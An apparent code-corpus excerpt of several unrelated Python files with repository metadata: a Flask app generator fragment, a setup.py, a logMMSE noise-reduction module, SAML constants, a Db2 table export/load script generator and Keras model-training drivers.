tp = ["\n@app.route('/endpoint')", "def endpoint():", "\t#endpoint.html", "\treturn codecs.open('web/endpoint.html', 'r', 'utf-8').read()"]
for line in tp:
lines.append(line.replace('endpoint', ep))
epFile = open(project+"/web/endpoint.html".replace('endpoint', ep),"w+")
epFile.write(index.replace('endpoint', ep).replace('style.css', ep+'.css').replace('script.js', ep+'.js'))
epFile.close()
os.system('touch '+project+'/static/'+ep+'.css')
os.system('touch '+project+'/static/'+ep+'.js')
endpoints = params['endpoints']
if endpoints is not None:
for ep in endpoints:
print('Endpoint: ' + ep)
tp = ["\n@app.route('/endpoint')", "def endpoint():", "\t#endpoint.html", "\treturn endpoint_route"]
for line in tp:
lines.append(line.replace('endpoint', ep))
	request_endpoints = params['request_endpoints']
if request_endpoints is not None:
request_endpoints = [request_endpoints[i * 3:(i + 1) * 3] for i in range((len(request_endpoints) + 3 - 1) // 3)]
for request_method, ep, request_param in request_endpoints:
print('Endpoint: ' + ep, '\nMethod: ' + request_method, '\nParameter: ' + request_param)
tp = ["\n@app.route('/"+ep+"/<"+request_param+">', methods=['"+request_method+"'])", "def "+ep+"("+request_param+"):", "\t#"+request_method+" method endpoint", "\treturn do_something("+request_param+")"]
for line in tp:
lines.append(line)
lines.append("\nif __name__ == '__main__':")
if params['wsgiserver']:
lines.append("\t#Run server forever")
lines.append("\tkeep_alive()")
else:
lines.append("\t#Run server")
lines.append("\trun()")
for line in lines:
f.write(line+'\n')
f.close()
	print('Created ' + project + ' app successfully.')
for param in params.keys():
if params[param] and param != 'app':
print(param, params[param])
os.system('open '+ project)
if __name__ == '__main__':
create_flask_app()
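# Example CLI usage (a sketch; the app name and endpoint values are illustrative):
#   python create_flask_app.py -a my_app -w 1 -s about contact -r GET user user_id
# This generates ./my_app with web/, static/ and a runnable my_app.py.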
| 39.141892 | 335 | 0.666494 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,616 | 0.451579 |
e689526fba8d369acce37c9eab4574f56f8a1f4b | 991 | py | Python | setup.py | clach04/discoverhue | 8f35cbc8ff9b5aab80b8be0443427058c1da51ed | [
"MIT"
] | 10 | 2017-09-26T22:34:38.000Z | 2021-11-19T22:37:59.000Z | setup.py | clach04/discoverhue | 8f35cbc8ff9b5aab80b8be0443427058c1da51ed | [
"MIT"
] | 7 | 2018-02-04T19:38:03.000Z | 2021-10-30T13:20:33.000Z | setup.py | clach04/discoverhue | 8f35cbc8ff9b5aab80b8be0443427058c1da51ed | [
"MIT"
] | 4 | 2019-06-28T15:26:45.000Z | 2022-01-20T02:26:05.000Z | from setuptools import setup
try:
import pypandoc
long_description = pypandoc.convert_file('README.md', 'rst', extra_args=())
except ImportError:
import codecs
long_description = codecs.open('README.md', encoding='utf-8').read()
long_description = '\n'.join(long_description.splitlines())
setup(
name='discoverhue',
description='Auto discovery of Hue bridges',
long_description=long_description,
version='1.0.2',
url='https://github.com/Overboard/discoverhue',
author='Overboard',
author_email='amwroute-git@yahoo.com',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='philips hue',
packages=['discoverhue'],
install_requires=['httpfind'],
)
| 26.078947 | 79 | 0.649849 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 427 | 0.430878 |
e68a7efe5fb704c535ff7a5982b5a18ddc07817d | 6,024 | py | Python | utils/logmmse.py | dbonattoj/Real-Time-Voice-Cloning | 7ce361b0e900cb0fad4289884f526578ba276481 | [
"MIT"
] | 3 | 2020-07-10T02:23:00.000Z | 2021-08-17T12:35:09.000Z | utils/logmmse.py | amoliu/Real-Time-Voice-Cloning | 7808d6f80aa9bbaffe367fde07b1c6f96cd3697e | [
"MIT"
] | 1 | 2020-09-30T09:29:57.000Z | 2020-10-31T15:38:50.000Z | utils/logmmse.py | amoliu/Real-Time-Voice-Cloning | 7808d6f80aa9bbaffe367fde07b1c6f96cd3697e | [
"MIT"
] | 5 | 2020-04-23T10:52:30.000Z | 2021-08-17T12:35:19.000Z | # The MIT License (MIT)
#
# Copyright (c) 2015 braindead
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
#
# This code was extracted from the logmmse package (https://pypi.org/project/logmmse/) and I
# simply modified the interface to meet my needs.
import numpy as np
import math
from scipy.special import expn
from collections import namedtuple
NoiseProfile = namedtuple("NoiseProfile", "sampling_rate window_size len1 len2 win n_fft noise_mu2")
def profile_noise(noise, sampling_rate, window_size=0):
"""
Creates a profile of the noise in a given waveform.
:param noise: a waveform containing noise ONLY, as a numpy array of floats or ints.
:param sampling_rate: the sampling rate of the audio
:param window_size: the size of the window the logmmse algorithm operates on. A default value
will be picked if left as 0.
:return: a NoiseProfile object
"""
noise, dtype = to_float(noise)
noise += np.finfo(np.float64).eps
if window_size == 0:
window_size = int(math.floor(0.02 * sampling_rate))
if window_size % 2 == 1:
window_size = window_size + 1
perc = 50
len1 = int(math.floor(window_size * perc / 100))
len2 = int(window_size - len1)
win = np.hanning(window_size)
win = win * len2 / np.sum(win)
n_fft = 2 * window_size
noise_mean = np.zeros(n_fft)
n_frames = len(noise) // window_size
for j in range(0, window_size * n_frames, window_size):
noise_mean += np.absolute(np.fft.fft(win * noise[j:j + window_size], n_fft, axis=0))
noise_mu2 = (noise_mean / n_frames) ** 2
return NoiseProfile(sampling_rate, window_size, len1, len2, win, n_fft, noise_mu2)
def denoise(wav, noise_profile: NoiseProfile, eta=0.15):
"""
Cleans the noise from a speech waveform given a noise profile. The waveform must have the
same sampling rate as the one used to create the noise profile.
:param wav: a speech waveform as a numpy array of floats or ints.
:param noise_profile: a NoiseProfile object that was created from a similar (or a segment of
the same) waveform.
:param eta: voice threshold for noise update. While the voice activation detection value is
below this threshold, the noise profile will be continuously updated throughout the audio.
Set to 0 to disable updating the noise profile.
:return: the clean wav as a numpy array of floats or ints of the same length.
"""
wav, dtype = to_float(wav)
wav += np.finfo(np.float64).eps
p = noise_profile
nframes = int(math.floor(len(wav) / p.len2) - math.floor(p.window_size / p.len2))
x_final = np.zeros(nframes * p.len2)
aa = 0.98
mu = 0.98
ksi_min = 10 ** (-25 / 10)
x_old = np.zeros(p.len1)
xk_prev = np.zeros(p.len1)
noise_mu2 = p.noise_mu2
for k in range(0, nframes * p.len2, p.len2):
insign = p.win * wav[k:k + p.window_size]
spec = np.fft.fft(insign, p.n_fft, axis=0)
sig = np.absolute(spec)
sig2 = sig ** 2
gammak = np.minimum(sig2 / noise_mu2, 40)
if xk_prev.all() == 0:
ksi = aa + (1 - aa) * np.maximum(gammak - 1, 0)
else:
ksi = aa * xk_prev / noise_mu2 + (1 - aa) * np.maximum(gammak - 1, 0)
ksi = np.maximum(ksi_min, ksi)
log_sigma_k = gammak * ksi/(1 + ksi) - np.log(1 + ksi)
vad_decision = np.sum(log_sigma_k) / p.window_size
if vad_decision < eta:
noise_mu2 = mu * noise_mu2 + (1 - mu) * sig2
a = ksi / (1 + ksi)
vk = a * gammak
ei_vk = 0.5 * expn(1, np.maximum(vk, 1e-8))
hw = a * np.exp(ei_vk)
sig = sig * hw
xk_prev = sig ** 2
xi_w = np.fft.ifft(hw * spec, p.n_fft, axis=0)
xi_w = np.real(xi_w)
x_final[k:k + p.len2] = x_old + xi_w[0:p.len1]
x_old = xi_w[p.len1:p.window_size]
output = from_float(x_final, dtype)
output = np.pad(output, (0, len(wav) - len(output)), mode="constant")
return output
def to_float(_input):
if _input.dtype == np.float64:
return _input, _input.dtype
elif _input.dtype == np.float32:
return _input.astype(np.float64), _input.dtype
elif _input.dtype == np.uint8:
return (_input - 128) / 128., _input.dtype
elif _input.dtype == np.int16:
return _input / 32768., _input.dtype
elif _input.dtype == np.int32:
return _input / 2147483648., _input.dtype
raise ValueError('Unsupported wave file format')
def from_float(_input, dtype):
if dtype == np.float64:
        return _input
elif dtype == np.float32:
return _input.astype(np.float32)
elif dtype == np.uint8:
return ((_input * 128) + 128).astype(np.uint8)
elif dtype == np.int16:
return (_input * 32768).astype(np.int16)
elif dtype == np.int32:
return (_input * 2147483648).astype(np.int32)
raise ValueError('Unsupported wave file format')
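# Example usage (a sketch; assumes `noise_clip` and `wav` are numpy arrays
# recorded at the same sampling rate, e.g. loaded via scipy.io.wavfile.read):
#   profile = profile_noise(noise_clip, sampling_rate=16000)
#   clean = denoise(wav, profile)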
| 36.957055 | 100 | 0.659529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,465 | 0.409197 |
e691c0247838523436befe1e1ccaf96b1e1135db | 374 | py | Python | src/minisaml/internal/constants.py | HENNGE/minisaml | d96aa5d294eee60521ad3c7084e8659b25935cee | [
"Apache-2.0"
] | 2 | 2020-09-13T15:55:50.000Z | 2021-01-07T07:40:24.000Z | src/minisaml/internal/constants.py | HENNGE/minisaml | d96aa5d294eee60521ad3c7084e8659b25935cee | [
"Apache-2.0"
] | 11 | 2020-08-26T12:27:39.000Z | 2021-11-17T16:10:00.000Z | src/minisaml/internal/constants.py | HENNGE/minisaml | d96aa5d294eee60521ad3c7084e8659b25935cee | [
"Apache-2.0"
] | 1 | 2021-10-07T11:49:28.000Z | 2021-10-07T11:49:28.000Z | NAMES_SAML2_PROTOCOL = "urn:oasis:names:tc:SAML:2.0:protocol"
NAMES_SAML2_ASSERTION = "urn:oasis:names:tc:SAML:2.0:assertion"
NAMEID_FORMAT_UNSPECIFIED = "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified"
BINDINGS_HTTP_POST = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
DATE_TIME_FORMAT = "%Y-%m-%dT%H:%M:%SZ"
DATE_TIME_FORMAT_FRACTIONAL = "%Y-%m-%dT%H:%M:%S.%fZ"
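# Example (parsing SAML timestamps with the formats above):
#   from datetime import datetime
#   datetime.strptime("2021-10-07T11:49:28Z", DATE_TIME_FORMAT)
#   datetime.strptime("2021-10-07T11:49:28.123456Z", DATE_TIME_FORMAT_FRACTIONAL)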
| 53.428571 | 83 | 0.759358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.596257 |
e692cff5589dc59f4785c76fbfa11c53ff5a1d4e | 305 | py | Python | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | 2 | 2021-12-01T17:04:39.000Z | 2022-01-20T22:53:40.000Z | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='This repository hosts some work-in-progress experiments applying deep learning to predict age using tractometry data.',
author='Joanna Qiao',
license='BSD-3',
)
| 27.727273 | 136 | 0.718033 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 151 | 0.495082 |
e6a5f147ff440a3daeccaecdee477658d01cb25a | 4,044 | py | Python | DBParser/DBMove.py | lelle1234/Db2Utils | 55570a1afbe6d4abe61c31952bc178c2443f4e5b | [
"Apache-2.0"
] | 4 | 2020-02-27T13:56:37.000Z | 2022-02-07T23:07:24.000Z | DBParser/DBMove.py | lelle1234/Db2Utils | 55570a1afbe6d4abe61c31952bc178c2443f4e5b | [
"Apache-2.0"
] | null | null | null | DBParser/DBMove.py | lelle1234/Db2Utils | 55570a1afbe6d4abe61c31952bc178c2443f4e5b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import ibm_db
import getopt
import sys
import os
from toposort import toposort_flatten
db = None
host = "localhost"
port = "50000"
user = None
pwd = None
outfile = None
targetdb = None
try:
opts, args = getopt.getopt(sys.argv[1:], "h:d:P:u:p:o:t:")
except getopt.GetoptError:
sys.exit(-1)
for o, a in opts:
if o == "-d":
db = a
if o == "-h":
host = a
if o == "-P":
port = a
if o == "-u":
user = a
if o == "-p":
pwd = a
if o == "-t":
targetdb = a
if db is None or user is None or pwd is None or targetdb is None:
print("Usage: DBMove.py [-h <host> -P <port>] -d <db> -u <user> -p <pwd> -t <target>")
sys.exit(1)
db = db.upper()
targetdb = targetdb.upper()
cfg = (db, host, port, user, pwd)
conn = ibm_db.connect("DATABASE=%s; HOSTNAME=%s; PORT=%s; PROTOCOL=TCPIP; UID=%s; PWD=%s" % cfg, "", "")
get_db_type = "values nya.get_db_type()"
find_edges = """
SELECT rtrim(t.tabschema) || '.' || rtrim(t.tabname)
, coalesce(rtrim(r.reftabschema) || '.' || rtrim(r.reftabname), 'dummy')
FROM syscat.tables t
LEFT JOIN syscat.references r
ON (t.tabschema, t.tabname) = (r.tabschema, r.tabname)
WHERE t.tabschema not like 'SYS%'
AND t.type = 'T'
AND rtrim(t.tabschema) not like 'NYA_%'
AND t.tabschema <> 'TMP'
ORDER BY 1
"""
identity_skip = """
select rtrim(tabschema) || '.' || rtrim(tabname) from syscat.columns
where identity = 'Y' and generated = 'D'
"""
stmt = ibm_db.prepare(conn, get_db_type)
ibm_db.execute(stmt, ())
tpl = ibm_db.fetch_tuple(stmt)
db_type = tpl[0]
edges = dict()
stmt = ibm_db.prepare(conn, find_edges)
ibm_db.execute(stmt, ())
tpl = ibm_db.fetch_tuple(stmt)
while tpl:
n1, n2 = tpl
try:
edges[n1].add(n2)
except KeyError:
edges[n1] = set()
edges[n1].add(n2)
tpl = ibm_db.fetch_tuple(stmt)
sorted_nodes = list(toposort_flatten(edges))
# print(sorted_nodes)
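# toposort_flatten orders tables so referenced (parent) tables come first, e.g.
# toposort_flatten({'S.CHILD': {'S.PARENT'}, 'S.PARENT': {'dummy'}})
# returns ['dummy', 'S.PARENT', 'S.CHILD'] (schema/table names illustrative).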
identity_skip_arr = []
stmt = ibm_db.prepare(conn, identity_skip)
ibm_db.execute(stmt, ())
tpl = ibm_db.fetch_tuple(stmt)
while tpl:
identity_skip_arr.append(tpl[0])
tpl = ibm_db.fetch_tuple(stmt)
# print(identity_skip)
os.makedirs(db, exist_ok=True)
export_file = open("%s/export.sql" % db, "w")
load_file = open("%s/load.sql" % db, "w")
export_file.write("connect to %s;\n" % db)
load_file.write("connect to %s;\n" % targetdb)
if db_type == "N":
load_file.write("""set integrity for nya.person off;\n""")
load_file.write("""alter table nya.person
alter column EMAIL_UC drop generated
alter column NORMALIZED_FIRSTNAME drop generated
alter column NORMALIZED_LASTNAME drop generated;\n""")
load_file.write("""set integrity for nya.person immediate checked;\n""")
for t in sorted_nodes:
if t == "dummy":
continue
export_file.write("export to %s.ixf of ixf lobs to . modified by codepage=819 messages export_%s.msg select * from %s;\n" % (t,t,t))
identityskip = "identityoverride"
if t in identity_skip_arr:
identityskip = " "
load_file.write("load from %s.ixf of ixf lobs from . modified by generatedoverride %s messages load_%s.msg replace into %s;\n" % (t, identityskip, t, t))
if db_type == "N":
load_file.write("""set integrity for nya.person off;\n""")
load_file.write("""alter table nya.person
alter column EMAIL_UC set generated always as ( upper(email))
alter column NORMALIZED_FIRSTNAME set generated always as ( NYA.REMOVE_DIACRITICS( FIRSTNAME ) )
alter column NORMALIZED_LASTNAME set generated always as ( NYA.REMOVE_DIACRITICS( LASTNAME ) );\n""")
load_file.write("""set integrity for nya.person immediate checked force generated;\n""")
load_file.write("""echo set integrity for all tables;\n""")
export_file.write("connect reset;\n")
load_file.write("connect reset;\n")
export_file.close()
load_file.close()
| 29.304348 | 157 | 0.633778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,022 | 0.5 |
e6b3c1a04d6b23957a4328b1a4d335f1079479f3 | 8,099 | py | Python | extras/usd/examples/usdMakeFileVariantModelAsset/usdMakeFileVariantModelAsset.py | DougRogers-DigitalFish/USD | d8a405a1344480f859f025c4f97085143efacb53 | [
"BSD-2-Clause"
] | 3,680 | 2016-07-26T18:28:11.000Z | 2022-03-31T09:55:05.000Z | extras/usd/examples/usdMakeFileVariantModelAsset/usdMakeFileVariantModelAsset.py | DougRogers-DigitalFish/USD | d8a405a1344480f859f025c4f97085143efacb53 | [
"BSD-2-Clause"
] | 1,759 | 2016-07-26T19:19:59.000Z | 2022-03-31T21:24:00.000Z | extras/usd/examples/usdMakeFileVariantModelAsset/usdMakeFileVariantModelAsset.py | DougRogers-DigitalFish/USD | d8a405a1344480f859f025c4f97085143efacb53 | [
"BSD-2-Clause"
] | 904 | 2016-07-26T18:33:40.000Z | 2022-03-31T09:55:16.000Z | #!/pxrpythonsubst
#
# Copyright 2016 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
'''
Creates a top-level, referenceable asset USD file from one or more
'variant' files, each of which can contain arbitrary scene description.
When supplying multiple files, one must also provide the name for a
variantSet that will be constructed to switch between the files.
The asset file will place the variant files behind a "payload", which will
enable consumers to defer loading and processing of the data when composed
onto a UsdStage.
The names of the created variations will be taken directly from the basename
of their corresponding input file.
'''
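# Example invocation (a sketch; the asset and file names are illustrative):
#   python usdMakeFileVariantModelAsset.py Chair chair_a.usd chair_b.usd \
#       --kind component --variantSet modelingVariant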
from __future__ import print_function
from pxr import Tf, Kind, Sdf, Usd
# ToDo:
# - handle multiple variantSets
# - layer multiple kinds of files (e.g. shading.usd over geom.usd)
# - allow output filename to be independently specifiable? (Breaks with Pixar
# convention)
# - allow variant names to be specified independently of variant file names
# - Compute and present (per-variant) UsdGeomModelAPI.extentsHint
# - Compute and author UsdModelAPI::SetPayloadAssetDependencies()
def CreateModelStage(assetName,
assetIdentifier=None,
kind=Kind.Tokens.component,
filesToReference=None,
variantSetName=None,
defaultVariantSelection=None):
# Preconditions....
if not Tf.IsValidIdentifier(assetName):
print("assetName '%s' must be a valid identifier. Aborting." %
assetName)
return None
if variantSetName and not Tf.IsValidIdentifier(variantSetName):
print("variantSetName '%s' must be a valid identifier. Aborting." %
variantSetName)
return None
if filesToReference and len(filesToReference) > 1 and not variantSetName:
# For now, we only allow multiple files to reference if we're switching
# them with a variantSet. We can relax this restriction when we can
# make internal payload arcs (bug #119960)
print("Cannot create multiple-file-reference without a variantSet. Aborting")
return None
if not Kind.Registry.IsA(kind, Kind.Tokens.model):
print("kind '%s' is not a valid model kind, which must be one of:" %
kind)
print(Kind.Registry.GetAllKinds())
return None
# Create the root file for the stage, and make it ASCII text.
# We need some nicer sugar for this.
fileName = assetName + ".usd"
rootLayer = Sdf.Layer.CreateNew(fileName, args = {'format':'usda'})
stage = Usd.Stage.Open(rootLayer)
# Name the root prim after the asset. Don't give it a type, since we
# want that to come from referenced files. Make it be the "default prim"
# so that we can reference the resulting file without specifying a
# prim path
rootPath = Sdf.Path.absoluteRootPath
modelRootPrim = stage.DefinePrim(rootPath.AppendChild(assetName))
stage.SetDefaultPrim(modelRootPrim)
modelAPI = Usd.ModelAPI(modelRootPrim)
modelAPI.SetKind(kind)
# See http://openusd.org/docs/api/class_usd_model_a_p_i.html#details
# for more on assetInfo
modelAPI.SetAssetName(assetName)
modelAPI.SetAssetIdentifier(assetIdentifier or fileName)
# Add a class named after the asset, and make the asset inherit from it.
# This is not necessary for a valid asset, and the class-naming is a Pixar
# convention. But always having a class associated with each asset is
# extremely useful for non-destructively editing many referenced or
# instanced assets of the same type.
classPrim = stage.CreateClassPrim(rootPath.AppendChild("_class_"+assetName))
modelRootPrim.GetInherits().AddInherit(classPrim.GetPath())
if not filesToReference:
# weird edge case... we're done
return stage
elif len(filesToReference) == 1 and not variantSetName:
# The other, more plausible edge case: we're just wrapping
# some other file (e.g. alembic) in order to give it a payload
# and other proper USD trappings - no variants
modelRootPrim.GetPayloads().AddPayload(Sdf.Payload(filesToReference[0]))
return stage
# OK, we're making a variantSet, and we are going to vary the payload
# in each variant
varSet = modelRootPrim.GetVariantSet(variantSetName)
for variantFile in filesToReference:
import os
variantName = os.path.splitext(os.path.basename(variantFile))[0]
# If we didn't specify a default selection, choose the first one
if not defaultVariantSelection:
defaultVariantSelection = variantName
varSet.AddVariant(variantName)
varSet.SetVariantSelection(variantName)
# The context object makes all edits "go inside" the variant we
# just created.
with varSet.GetVariantEditContext():
modelRootPrim.GetPayloads().AddPayload(Sdf.Payload(variantFile))
# Now put the variantSet into the state we want it to be in by default
varSet.SetVariantSelection(defaultVariantSelection)
return stage
if __name__ == "__main__":
import argparse, os, sys
descr = __doc__.strip()
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
description=descr)
parser.add_argument('assetName')
parser.add_argument('variantFiles', nargs='+')
parser.add_argument(
'-k', '--kind', default='component', action='store', metavar='kind',
help="Model kind, one of: component, group, or assembly")
parser.add_argument(
'-v', '--variantSet', default='', action='store', metavar='variantSet',
help="Variantset to create to modulate variantFiles. Can be elided "
"if only one file is supplied")
parser.add_argument(
'-i', '--identifier', default='', action='store', metavar='identifier',
help="The identifier you would expect your Ar asset-resolver plugin "
"to resolve to the (installed) assetName.usd file this script creates. "
" If unspecified, defaults to assetName.usd")
parser.add_argument(
'-d', '--defaultVariantSelection', default='', action='store',
metavar='defaultVariantSelection',
help="This variant will be selected by default when the asset is "
"added to a composition. If unspecified, will be the variant for "
"'variantFile1'")
args = parser.parse_args()
if not args.assetName or args.assetName == '':
parser.error("No assetName specified")
stage = CreateModelStage(args.assetName,
assetIdentifier=args.identifier,
kind=args.kind,
filesToReference=args.variantFiles,
variantSetName=args.variantSet,
defaultVariantSelection=args.defaultVariantSelection)
if stage:
stage.GetRootLayer().Save()
exit(0)
else:
exit(1)
| 44.256831 | 85 | 0.684159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,422 | 0.545993 |
e6ba0ea03b3d3e18b20568efd5fed882e88148ea | 1,834 | py | Python | lib/galaxy/model/migrate/versions/0073_add_ldda_to_implicit_conversion_table.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | null | null | null | lib/galaxy/model/migrate/versions/0073_add_ldda_to_implicit_conversion_table.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 1 | 2015-02-21T18:48:19.000Z | 2015-02-27T15:50:32.000Z | lib/galaxy/model/migrate/versions/0073_add_ldda_to_implicit_conversion_table.py | blankenberg/galaxy-data-resource | ca32a1aafd64948f489a4e5cf88096f32391b1d9 | [
"CC-BY-3.0"
] | 3 | 2015-02-22T13:34:16.000Z | 2020-10-01T01:28:04.000Z | """
Migration script to add 'ldda_parent_id' column to the implicitly_converted_dataset_association table.
"""
from sqlalchemy import *
from sqlalchemy.orm import *
from migrate import *
from migrate.changeset import *
import logging
log = logging.getLogger( __name__ )
metadata = MetaData()
def upgrade(migrate_engine):
metadata.bind = migrate_engine
print __doc__
metadata.reflect()
try:
Implicitly_converted_table = Table( "implicitly_converted_dataset_association", metadata, autoload=True )
if migrate_engine.name != 'sqlite':
c = Column( "ldda_parent_id", Integer, ForeignKey( "library_dataset_dataset_association.id" ), index=True, nullable=True )
else:
#Can't use the ForeignKey in sqlite.
c = Column( "ldda_parent_id", Integer, index=True, nullable=True )
c.create( Implicitly_converted_table, index_name="ix_implicitly_converted_dataset_assoc_ldda_parent_id")
assert c is Implicitly_converted_table.c.ldda_parent_id
except Exception, e:
print "Adding ldda_parent_id column to implicitly_converted_dataset_association table failed: %s" % str( e )
log.debug( "Adding ldda_parent_id column to implicitly_converted_dataset_association table failed: %s" % str( e ) )
def downgrade(migrate_engine):
metadata.bind = migrate_engine
metadata.reflect()
try:
Implicitly_converted_table = Table( "implicitly_converted_dataset_association", metadata, autoload=True )
Implicitly_converted_table.c.ldda_parent_id.drop()
    except Exception as e:
        print("Dropping ldda_parent_id column from implicitly_converted_dataset_association table failed: %s" % str(e))
log.debug( "Dropping ldda_parent_id column from implicitly_converted_dataset_association table failed: %s" % str( e ) )
e6c8ce8afe1fef7a0e2e19b44facdada82817d59 | 311 | py | Python | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | ["Apache-2.0"] | 6 | 2017-05-07T09:39:18.000Z | 2021-10-07T01:46:08.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | ["Apache-2.0"] | 1 | 2018-01-15T15:31:03.000Z | 2018-01-15T15:31:03.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | ["Apache-2.0"] | 5 | 2020-02-28T04:16:16.000Z | 2021-04-30T09:35:19.000Z
from YoshiViz import Gui
if __name__ == '__main__':
#file director
gui = Gui.Gui()
"""
report_generator.\
generate_pdf_report(fileDirectory, repositoryName, tempCommunityType)
"""
    # repositoryName and tempCommunityType are not defined in this entry point
    # (they would come from the report-generation step above), so this status
    # line stays disabled until that step is wired up:
    # print('the type of', repositoryName, 'is', tempCommunityType, '\n"check .\\YoshiViz\\output"')
e6cb563badebdde1d425f141d7f04f5b497ea2ae | 2,643 | py | Python | models/train.py | Hiwyl/keras_cnn_finetune | f424302a72c8d05056a9af6f9b293003acb8398d | ["MIT"] | 1 | 2019-09-30T01:07:03.000Z | 2019-09-30T01:07:03.000Z | models/train.py | Hiwyl/keras_cnn_finetune | f424302a72c8d05056a9af6f9b293003acb8398d | ["MIT"] | null | null | null | models/train.py | Hiwyl/keras_cnn_finetune | f424302a72c8d05056a9af6f9b293003acb8398d | ["MIT"] | null | null | null
# -*- encoding: utf-8 -*-
'''
@Author : lance
@Email : wangyl306@163.com
'''
import time
from model_cx.inceptionresnet import inceptionresnet
from model_cx.vgg19two import vgg19_all_lr
from model_cx.inceptionv3 import inceptionv3
from model_cx.densenet import densenet
from model_cx.nasnet import nasnet
from model_cx.merge import merge
from model_cx.bcnn import bilinearnet
from model_cx.resnet import ResNet50
from model_cx.mobilenetv2 import mobilenetv2
from model_cx.senet import senet
if __name__=="__main__":
classes = 1
epochs = 100
steps_per_epoch = 113
validation_steps = 48
shape=(224,224)
print("开始训练...")
start = time.time()
#
# try:
# print("densenet")
# densenet(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
# try:
# print("bcnn")
# bilinearnet(classes, epochs, steps_per_epoch, validation_steps, shape)
#
# except Exception as e:
# print(e)
# try:
# print("resnet")
# ResNet50(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
try:
print("merge")
merge(classes, epochs, steps_per_epoch, validation_steps, shape)
except Exception as e:
print(e)
# try:
# print("ince_res")
# inceptionresnet(classes, epochs, steps_per_epoch, validation_steps, (299, 299))
# # inceptionresnet(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
# try:
# print("mobilenetv2")
# mobilenetv2(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
# try:
# print("inceptionv3")
# inceptionv3(classes, epochs, steps_per_epoch, validation_steps, (299, 299))
# # inceptionv3(classes, epochs, steps_per_epoch, validation_steps, shape)
# except Exception as e:
# print(e)
try:
print("nasnet")
nasnet(classes, epochs, steps_per_epoch, validation_steps, shape)
except Exception as e:
print(e)
try:
print("vgg19two")
vgg19_all_lr(classes, epochs, steps_per_epoch, validation_steps, shape)
except Exception as e:
print(e)
try:
print("senet")
        senet(classes, epochs, steps_per_epoch, validation_steps, (100, 100))
except Exception as e:
print(e)
end = time.time()
print("ETA:", (end - start) / 3600) | 31.094118 | 90 | 0.623156 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,216 | 0.458695 |
e6cfd0714854720779418d4a80b8997e25e611e3 | 3,227 | py | Python | python-function-files-dictionaries/week4-assignment1.py | MauMendes/python3-programming-specialization | 8bd259f0ac559c6004baa0e759b6ec4bc25e1320 | ["MIT"] | null | null | null | python-function-files-dictionaries/week4-assignment1.py | MauMendes/python3-programming-specialization | 8bd259f0ac559c6004baa0e759b6ec4bc25e1320 | ["MIT"] | null | null | null | python-function-files-dictionaries/week4-assignment1.py | MauMendes/python3-programming-specialization | 8bd259f0ac559c6004baa0e759b6ec4bc25e1320 | ["MIT"] | null | null | null
